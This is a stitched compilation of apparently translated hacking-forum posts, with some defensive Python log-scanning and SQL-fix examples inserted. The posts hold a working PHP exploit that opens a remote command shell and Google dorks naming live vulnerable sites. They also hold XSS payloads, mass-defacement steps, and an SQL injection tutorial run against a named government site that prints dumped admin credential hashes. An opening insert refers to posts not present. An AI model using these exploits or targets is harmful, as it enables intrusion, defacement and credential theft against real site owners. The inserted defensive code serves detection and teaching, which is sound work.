I am not responsible for misuse of the tutorial above; it is only for learning

thanks to: Slemanroot.net
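A defender's view of the upload posts above (Fluid_forms, ThisWay, Pitch Print, Atom, Easy Gallery, ninetofive and n-media), as an added example that is not code from the original page: it scans web server access logs in combined format for POSTs to the upload handlers the posts name and for script files requested from upload directories, and marks the case where both come from the same client. The function names, the rule names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Upload handlers named in the posts above (paths copied from the page, lowercased).
UPLOAD_HANDLERS = (
    "/wp-content/plugins/fluid_forms/file-upload/server/php/",
    "/wp-content/themes/thisway/includes/uploadify/upload_settings_image.php",
    "/wp-content/plugins/pitchprint/uploader/",
    "/wp-content/themes/atom/uploadify/uploadify.php",
    "/wp-content/plugins/wp-easy-gallery/admin/php.php",
    "/wp-content/themes/ninetofive/scripts/doajaxfileupload.php",
)
# Directories those handlers write to; no script should ever be served from them.
# The n-media handler is reached through /wp-admin/admin-ajax.php with the action
# in the POST body, so an access log only shows it through this second rule.
DROP_DIRS = (
    "/wp-content/uploads/",
    "/wp-content/plugins/fluid_forms/file-upload/server/php/files/",
    "/wp-content/plugins/pitchprint/uploader/file/",
)
SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|phar)$")

# Combined log format up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def normalize(target):
    """Drop the query string, decode %xx, collapse '//' and lowercase the path."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()


def scan(lines):
    """Return one finding per suspicious request.

    'chained' is True when a script request in an upload directory follows an
    upload POST from the same client address earlier in the log.
    """
    uploaders = set()
    findings = []
    for number, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalize(m["target"])
        ip, served = m["ip"], m["status"] == "200"
        if SCRIPT_EXT.search(path) and path.startswith(DROP_DIRS):
            findings.append({"line": number, "ip": ip, "path": path,
                             "rule": "script_in_upload_dir",
                             "served": served, "chained": ip in uploaders})
        elif m["method"] == "POST" and path.startswith(UPLOAD_HANDLERS):
            uploaders.add(ip)
            findings.append({"line": number, "ip": ip, "path": path,
                             "rule": "post_to_upload_handler",
                             "served": served, "chained": False})
    return findings


# Constructed sample lines (documentation address ranges, invented file names).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Apr/2015:10:00:01 +0000] "GET /wp-content/themes/ninetofive/scripts/doajaxfileupload.php HTTP/1.1" 200 37 "-" "curl/7.38.0"',
    '198.51.100.7 - - [01/Apr/2015:10:00:05 +0000] "POST /wp-content/themes/ninetofive/scripts/doajaxfileupload.php HTTP/1.1" 200 52 "-" "curl/7.38.0"',
    '198.51.100.7 - - [01/Apr/2015:10:00:09 +0000] "GET /wp-content/uploads/2015/04/sample_551a89b8.php HTTP/1.1" 200 1204 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [01/Apr/2015:10:02:00 +0000] "GET /wp-content//plugins//fluid_forms/file-upload/server/php/files/sample.PHP HTTP/1.1" 404 162 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Apr/2015:10:03:00 +0000] "GET /wp-content/uploads/2015/04/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Apr/2015:10:03:10 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "CHAINED" if f["chained"] else "-"
        print(f'{f["line"]:>3} {f["ip"]:<15} {f["rule"]:<24} {flag:<8} {f["path"]}')
```

A served, chained `script_in_upload_dir` finding is the one to treat as an incident. The matching preventive control is to stop the web server from executing scripts under the upload directories and to remove or update the affected plugins and themes.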

Fennel InfoTech CMS All Version Sql-Injection

Google Dork: "Designed by: Fennel Infotech"  , intext:"Designed by: Fennel Infotech" inurl:"id="

SQL injection exists in Fennel Infotech CMSes. Because the CMSes are custom, we don't have a default PHP file like term.php?id=

so we must use a dork to find vulnerable websites



PoC of Vulnerability:

 http://klgshare.in/service-detail.php?id=9%27

 http://www.jewellerytaglabel.com/tags_details.php?id=63%27

 http://www.touchofhopefoundation.org/sub.php?id=36%27

[Default Admin Page]

You Should Add '/admin/' at the end of the URL

Inject manually or use havij!

Nb: use this for positive things. TS is not responsible if you use it for negative things, so it is just for learning.

Thank you, happy learning

By Tener_Attacker

Softbit Solutions SQL Injection

!=========================================!
[+] Google Dork : "Powered By : Softbit Solutions" + inurl:id=
[+] Vulnerable_parameter : "ID" .
!=========================================!
Demo :
vishvavedanta.com/news_events.php?id=2
http://dronacharyapublicschool.com/weekly_details.php?ID=5
===========================================
Thanks to: ID

Open-Letters - Remote PHP Code Injection Vulnerability By Tunisian Cyber

/*
OutPut:
#[+] Author: TUNISIAN CYBER
#[+] Script coded BY: Egidio Romano aka EgiX
#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability
#[+] Date: 19-04-2015
#[+] Vendor: http://www.open-letters.de/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] CVE:
#[+] Twitter: @TCYB3R
#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com
#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png
OL-shell>

*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die( "\n[-] No response from {$host}:80\n");

    fwrite($sock, $packet);
    return stream_get_contents($sock);
}

print "#[+] Author: TUNISIAN CYBER\n";
print "#[+] Script coded BY: Egidio Romano aka EgiX\n";
print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability\n";
print "#[+] Date: 19-04-2015\n";
print "#[+] Vendor: http://www.open-letters.de/\n";
print "#[+] Type: WebAPP\n";
print "#[+] Tested on: KaliLinux (Debian)\n";
print "#[+] CVE:\n";
print "#[+] Twitter: @TCYB3R\n";
print "#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com\n";
print "#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] ";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /zenphoto/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

$exploit = "foo=";
$packet  = "POST {$path}external_scripts/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($exploit)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$exploit}";

http_send($host, $packet);

$packet  = "GET {$path}external_scripts/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
    print "\nOL-shell> ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
    print $m[1] : die("\n[-] Exploit failed!\n");
}

?>

WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities

Advisory ID: HTB23254
Product: TheCartPress WordPress plugin
Vendor: TheCartPress team
Vulnerable Version(s): 1.3.9 and probably prior
Tested Version: 1.3.9
Advisory Publication:  April 8, 2015  [without technical details]
Vendor Notification: April 8, 2015
Public Disclosure: April 29, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284]
CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302
Risk Level: High
CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP code, disclose sensitive data, and perform Cross-Site Scripting attacks against users of WordPress installations with the vulnerable plugin.

1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301

Input passed via the "tcp_box_path" HTTP POST parameter passed to "/wp-admin/admin.php?page=checkout_editor_settings" URL is not properly verified before being used in PHP 'include()' function, and can be abused to include arbitrary local files via directory traversal sequences.

In order to successfully exploit the vulnerability an attacker needs to have administrator privileges on WordPress installation, however this can be also exploited via CSRF vector to which the script is vulnerable as well.

Simple CSRF exploit below will execute the content of '/etc/passwd' file when a logged-in administrator will visit a page with it:

 document.main.submit();



2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300

During the checkout process, many user-supplied HTTP POST parameters (see complete list in PoC) in "Shipping address" and "Billing address" sections are not being sanitized before being stored in the local database.

Simple mass-XSS PoC against "Billing address" section (PoC against "Shipping address" section is identical, just replace 'billing_' prefix with 'shipping_') will write several JS pop-up alerts into the application database:



A non-authenticated attacker may inject malicious HTML and JS code that will be stored in the application database, and available to any non-authenticated user on the following URL:

http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order

As well as on the following URL accessible to WordPress administrator only:

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php


3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302

Any non-authenticated user may browse orders of other users due to broken authentication mechanism. To reproduce the vulnerability an attacker shall first open the following URL:
http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id]

And just after open the following URL to see full order details:
http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order

Moreover, the order ID can be easily predicted, as every new order ID is an incremented value of the previous one. This enables non-authenticated remote attacker to steal all currently-existing orders.


4) Multiple XSS in TheCartPress WordPress plugin (against administrator only): CVE-2015-3300

4.1 Input passed via the "search_by" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php&search_by=--%3E%%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.2 Input passed via the "address_id", "address_name", "firstname", "lastname", "street", "city", "postcode", "email" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_name=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&firstname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&lastname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&street=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&city=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&postcode=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&email=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.3 Input passed via the "post_id" and "rel_type" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.4 Input passed via the "post_type" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

-----------------------------------------------------------------------------------------------

Solution:

2015-04-08 Vendor Alerted via emails.
2015-04-17 Vendor Alerted via contact form and emails.
2015-04-17 Vendor Alerted via WordPress Support Forums.
2015-04-27 Fix Requested via emails.
2015-04-29 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.
According to the vendor, the plugin will no longer be supported as of 1st of June 2015: http://thecartpress.com/extend/important-note-nota-importante/

We recommend disabling or removing the vulnerable plugin as a workaround.
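
Because the advisory reports no vendor fix, reviewing web server logs for requests that match the reported pattern helps while the plugin is being removed. The following is an added example, not part of the advisory: it flags requests to TheCartPress admin pages whose query parameters decode to HTML metacharacters. The log lines are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address and request target of a combined-format access log entry.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[0-9.]+"')
# Characters needed to break out of an HTML attribute or to open a tag.
MARKUP = re.compile(r"[<>\"']")
PLUGIN_ADMIN = "thecartpress/admin/"


def flag_request(target):
    """Return (page, [parameter names]) when a request to a TheCartPress admin
    page carries HTML metacharacters in a query parameter, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    pairs = parse_qsl(parts.query, keep_blank_values=True)  # percent-decodes values
    page = next((v for k, v in pairs if k == "page"), "")
    if not page.startswith(PLUGIN_ADMIN):
        return None
    hits = sorted({k for k, v in pairs if k != "page" and MARKUP.search(v)})
    return (page, hits) if hits else None


def scan(lines):
    """Return a list of (client_ip, page, parameter names) for flagged lines."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        hit = flag_request(m.group(2))
        if hit:
            findings.append((m.group(1), hit[0], hit[1]))
    return findings


# Constructed sample entries: two use the advisory's proof-of-concept value,
# one is an ordinary plugin request, one is outside the plugin's pages.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Apr/2015:10:01:02 +0000] "GET /wp-admin/admin.php?'
    'page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type='
    '%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E HTTP/1.1" 200 5120',
    '203.0.113.7 - - [29/Apr/2015:10:01:09 +0000] "GET /wp-admin/admin.php?'
    'page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E'
    '%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E HTTP/1.1" 200 4801',
    '198.51.100.4 - - [29/Apr/2015:10:02:30 +0000] "GET /wp-admin/admin.php?'
    'page=thecartpress/admin/AssignedCategoriesList.php&post_id=12&rel_type=abc'
    ' HTTP/1.1" 200 4410',
    '198.51.100.4 - - [29/Apr/2015:10:03:11 +0000] "GET /wp-admin/edit.php?'
    's=%3Cb%3E HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, page, params in scan(SAMPLE_LOG):
        print(ip, page, params)
```

Legitimate values containing an apostrophe (for example in a city name) will also be flagged, so treat the output as a triage list rather than a verdict.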

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23254 - https://www.htbridge.com/advisory/HTB23254 - Multiple vulnerabilities in TheCartPress WordPress plugin.
[2] TheCartPress WordPress plugin - http://thecartpress.com/ - Professional WordPress eCommerce Plugin. Use it as Shopping Cart, Catalog or Framework.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Mass Deface

Materials:
  • Mass Deface (already included in shells such as X Inject / IDCA / etc.)
  • A website whose directory contains other domains/sites.
Go into the directory that contains the sites.
Click the mass deface option in the shell (hopefully there are many sites there :v).
Put the script code into the index code.
Click Deface/Hajar.
And that's all, enjoy.

:) Thanks

NB: all sins are borne by the perpetrator; the thread starter wrote this only for learning purposes.

Thanks to: IDCA

Manual SQLi Tutorial

By: Tener_Attacker

SQL Injection is a hacking technique in which an attacker can insert SQL commands through the URL to be executed by the database. The main cause of this flaw is a variable that is insufficiently filtered:

id=$id;……. > Got Error

The first thing we have to do is find out whether the site is affected by the SQL Injection flaw or not, by causing an error: add the ‘ character before or after the number in the URL.

Example: http://situstarget.com/news.php?id=1’ http://situstarget.com/news.php?id=’1

First we look for a website that has an SQL Injection flaw. Search for a target on Google using a dork.

SQLi dorks:


inurl:azerty.php?id= , inurl:bouquin.php?id= , inurl:lien.php?id= , inurl:clavier.php?id= , inurl:index.php?id= , inurl:trainers.php?id= , inurl:buy.php?category= , inurl:article.php?ID= , inurl:play_old.php?id= , inurl:games.php?id= , inurl:iniziativa.php?in= , inurl:curriculum.php?id= , inurl:labels.php?id= , inurl:story.php?id= , inurl:look.php?ID= , inurl:newsone.php?id= , inurl:aboutbook.php?id= , inurl:material.php?id= , inurl:opinions.php?id= , inurl:announce.php?id=
Here I have already found a target: http://diklat.lampungprov.go.id/more.php?id=1




Next we will find and count the number of tables in the site's database. Use the command: order by 1 - and so on until an error occurs on the page. Use the + sign as a space, and end the command with the -- sign.

http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Too many, so the rest are skipped]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error


  http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error




At the number 18 an error appears, so we take the number before the error message appeared. That means the number of tables in the database is 17.


Next we will look for the table number that we can use for the injection commands in the next stage. Use the union select command followed by the number of tables, with a - sign before the number, and ending with the -- sign. Example:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--




A bold number will then appear; that number is where we will insert the subsequent commands.


In the next stage we will find out the database version used by the site. Use the command "version()" or "@@version". Example:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--




In the picture we can see that the database version in use is v.5.5.14. Version 5 differs from version 4: the process is more troublesome on version 4, because to run SQLi commands on version 4 we have to guess the tables in the database one by one.

Now, with the next command, we will display the names of the tables on the site. Use the command "group_concat(table_name)" and add the command "from+information_schema.tables+where+table_schema=database()" after the last number, ending with the -- sign. Example:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--



There we obtain the table names, such as: tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, etc. The next step is to look for the admin username and password in the tbadmin table. Note that table names are not the same on every site, so to find the admin table, estimate which table you suspect holds the admin username and password. Then, to bring out the contents of the tbadmin columns, use the following command: "group_concat(columns_name)" and the command "from+information_schema.columns+where+table_name=CHAR()" after the last number, ending with the -- sign. At this stage the table name tbadmin must first be converted to decimal form :) use the tool HERE. The result of converting tbadmin is 116 98 97 100 109 105 110; we then put it into CHAR(116, 98, 97, 100, 109, 105, 110), separated by commas. So the command is as follows:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--



There the columns username, pswd and status appear. The next step is to view the contents of those columns by adding the command group_concat(username,0x3a,pswd,0x3a,status). Do not forget to add the code 0x3a between each of them; it is the hexadecimal conversion of the colon ( : ). Then add the command +from+tbadmin--, where tbadmin is the table we obtained earlier.

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--



Now the username and password are visible.. :) The picture shows the data: user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0. Next, all that is left is to crack the password, which is in the form of an md5 hash.
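
The root cause named at the start of this tutorial, an id variable placed into the query without filtering, shown beside its fix. This is an added example, not part of the original post: it uses an in-memory SQLite database with a constructed three-column table (the tutorial's site had 17), and the function names are hypothetical. The inputs are the probe shapes from the tutorial as they arrive after URL decoding.

```python
import sqlite3

QUERY = "SELECT id, title, body FROM news WHERE id="


def make_db():
    """Constructed sample database standing in for the site's news table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'Schedule', 'Constructed sample row')")
    return db


def more_vulnerable(db, raw_id):
    """The flaw: request input is concatenated into the SQL text (id=$id)."""
    return db.execute(QUERY + raw_id).fetchall()


def more_bound(db, raw_id):
    """The fix: the input is bound as a value and is never parsed as SQL."""
    return db.execute(QUERY + "?", (raw_id,)).fetchall()


def outcome(handler, db, raw_id):
    """Rows returned by the handler, or 'sql-error' if the statement failed."""
    try:
        return handler(db, raw_id)
    except sqlite3.Error:
        return "sql-error"


# Probe shapes taken from the tutorial text, adapted to three columns.
PROBES = [
    "1",                         # normal request
    "1'",                        # quote test
    "1 order by 3--",            # count probe, within range
    "1 order by 4--",            # count probe, out of range
    "-1 union select 1,2,3--",   # injected row of constants
]


def report():
    """Map each probe to (vulnerable outcome, bound outcome)."""
    db = make_db()
    return {p: (outcome(more_vulnerable, db, p), outcome(more_bound, db, p))
            for p in PROBES}


if __name__ == "__main__":
    for probe, (vuln, bound) in report().items():
        print(f"{probe!r:28} vulnerable={vuln!r} bound={bound!r}")
```

With concatenation, every probe produces a distinguishable response (an error, the normal row, or an injected row), which is what each step of the tutorial depends on. With a bound parameter, the same inputs are compared as plain values and match nothing.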

Getting to Know the MITM (Man-in-the-Middle) Attack

There are already many articles on ilmuhacking that discuss man-in-the-middle (MITM) attack techniques, but I have never explained in detail what a MITM attack is. A MITM attack is a very dangerous type of attack and can happen anywhere, whether on websites, mobile phones, or traditional means of communication such as postal mail. I therefore think there needs to be one dedicated article that discusses MITM attacks regardless of what the technical implementation is or where it takes place.

Not Just Sniffing
Many people may think that the goal of a MITM attack is to eavesdrop on confidential data communication, as in sniffing. Sniffing can be called a passive attack because in sniffing the attacker takes no action other than monitoring the data passing by. It is true that with a MITM attack an attacker can learn what the two communicating parties are talking about. However, the greatest strength of MITM is not its sniffing ability but its ability to intercept and alter the communication, so a MITM attack can be called an active type of attack.
The figure below shows scenarios an attacker can carry out with a MITM attack.

[Figure: sniffing, intercepting, tampering, fabricating]
The figure shows 4 kinds of attack that can be carried out with MITM. The following explains each type of attack in the scenario shown in the figure above.

  • Sniffing: Charlie learns everything said between Alice and Bob.
  • Intercepting: Charlie intercepts the message from Alice when Alice wants to close the conversation with “Bob I’m going to sleep, Bye!”. As a result, Bob thinks Alice is still communicating with him.
  • Tampering: Charlie changes Bob's answer to Alice, replacing Bob's PayPal account with Charlie's.
  • Fabricating: Charlie asks Bob for his social security number, although Alice never asked this question.
With MITM, one can imagine how much damage Charlie could do to Alice and Bob.

How a Man-in-the-Middle Attack Happens
In a MITM attack, an attacker sits in the middle of the communication between two parties. Everything said between them has to pass through the attacker in the middle first. The attacker is free to eavesdrop on, intercept, alter and even forge the communication, as I explained earlier.
Now let us look at how MITM happens in the example case of Alice communicating with Bob. Charlie, as the attacker, will try to place himself between Alice and Bob. For Charlie to succeed in becoming the person in the middle, he must:

  • pose as Bob in front of Alice
  • pose as Alice in front of Bob
[Figure: Charlie acts as fake Bob and fake Alice]
In MITM, Alice thinks she is talking to Bob, when in fact she is talking to Charlie. Likewise Bob thinks he is talking to Alice, when in fact he is talking to Charlie. So to become the person in the middle, Charlie must be able to impersonate on both sides, not just on one.
Why can Alice and Bob be trapped and deceived by Charlie? Because Alice and Bob do not authenticate each other before communicating. Authentication guarantees that Alice talks to the real Bob, not a fake Bob played by Charlie. Likewise, with authentication Bob talks to the real Alice, not a fake Alice played by Charlie.

The Importance of Authentication: Who Are You Speaking With?

Authentication is the process of proving the identity of a subject, which can be a person or a machine. There are many ways to prove someone's identity, but all of them can be grouped into 3 categories:

  • What you know: PIN, password, public-private key pair
  • What you have: smart card, key, USB dongle
  • What you are: fingerprint, retina
In short, authentication answers the question “Who are you speaking with?”. That question is very important to answer before two parties communicate. If two parties communicate without authenticating first, both can be trapped into talking to the wrong person, namely someone impersonating the other party. If this happens the consequences can be very serious, one of them being a MITM attack.
When two people who already know each other talk face to face, it is impossible for them to be trapped and deceived into talking to the wrong person. Authentication becomes very important when the two parties talk over a long-distance communication medium such as the telephone or the internet. In long-distance communication we can only hear the other party's voice, so the chance of talking to the wrong person is very high.
So the way to prevent a MITM attack is to authenticate before communicating. Even if authentication is performed by only one of the parties, that is already enough to prevent MITM. Let us look again at the example of Alice, Bob and Charlie, where only Bob is authenticated and Alice is not. Because Alice is not authenticated, Charlie can pose as Alice in front of Bob, but Charlie cannot pose as Bob in front of Alice. Why can Charlie not pose as Bob? Because Alice will test Bob's authenticity through authentication, so Charlie's disguise as a fake Bob will be exposed and Alice will refuse to continue the communication.
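
The closing argument, that authenticating Bob alone is enough to stop Charlie, as an added simulation that is not part of the original article. Assumptions: the parties agree on a key with a toy Diffie-Hellman group (illustration only, not a production parameter set), and Bob proves his identity with an HMAC under a key that only Alice and Bob know; a deployed protocol would normally use a signature made with Bob's private key instead. All function names are hypothetical.

```python
import hashlib
import hmac
import secrets

# Toy finite-field Diffie-Hellman parameters, for illustration only.
P = 2**255 - 19
G = 2


def keypair():
    """Return (private exponent, public value)."""
    priv = secrets.randbelow(P - 3) + 2
    return priv, pow(G, priv, P)


def session_key(priv, peer_pub):
    """Key both ends derive from their own private and the peer's public value."""
    shared = pow(peer_pub, priv, P)
    return hashlib.sha256(shared.to_bytes(32, "big")).digest()


def bob_proof(auth_key, alice_pub, bob_pub):
    """Bob's proof of identity, bound to the public values of this session."""
    transcript = alice_pub.to_bytes(32, "big") + bob_pub.to_bytes(32, "big")
    return hmac.new(auth_key, transcript, hashlib.sha256).digest()


def exchange(alice_checks_bob, charlie_substitutes):
    """Run one key exchange with Charlie on the path between Alice and Bob."""
    auth_key = secrets.token_bytes(32)   # known to Alice and Bob, not Charlie
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    c_priv, c_pub = keypair()

    # Alice -> Bob: her public value. Charlie may swap in his own.
    seen_by_bob = c_pub if charlie_substitutes else a_pub
    # Bob -> Alice: his public value plus a proof over what he received and sent.
    proof = bob_proof(auth_key, seen_by_bob, b_pub)
    # Charlie may swap Bob's value too, but can only forward the proof as is.
    seen_by_alice = c_pub if charlie_substitutes else b_pub

    if alice_checks_bob:
        expected = bob_proof(auth_key, a_pub, seen_by_alice)
        if not hmac.compare_digest(expected, proof):
            # Fake Bob exposed: Alice refuses to continue.
            return {"alice_continues": False, "charlie_has_alice_key": False}

    alice_key = session_key(a_priv, seen_by_alice)
    charlie_key = session_key(c_priv, a_pub)   # the only key Charlie can compute
    return {
        "alice_continues": True,
        "charlie_has_alice_key": hmac.compare_digest(alice_key, charlie_key),
    }


if __name__ == "__main__":
    print("no authentication, Charlie active:", exchange(False, True))
    print("Bob authenticated, Charlie active:", exchange(True, True))
    print("Bob authenticated, Charlie relays:", exchange(True, False))
```

The proof covers the key-exchange values rather than a bare challenge, so forwarding Bob's genuine answer does not help Charlie: relaying everything unchanged leaves him without the session key.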

Thanks ^_^








How to Create a Document via Mobile Phone

For example:
https://m2.facebook.com/editdoc.php?group_id=1559206537688320&hc_location=ufi&_rdr

Just copy and paste the link and change the group ID to match the ID of the group in question.

Complete SQL Injection / Havij Dorks

